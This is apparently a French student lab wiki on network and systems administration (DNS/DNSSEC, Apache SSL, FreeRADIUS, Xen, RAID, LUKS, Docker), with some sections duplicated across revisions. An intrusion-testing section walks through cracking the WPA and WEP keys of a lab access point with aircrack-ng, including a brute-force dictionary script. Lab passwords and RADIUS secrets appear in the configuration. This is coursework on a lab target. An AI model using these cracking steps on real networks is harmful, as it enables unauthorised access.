On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49128TP sysres IMA5sc 2018/2019 G72018-12-21T18:01:40Z<p>Mcreteur : /* 6. Réalisation */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
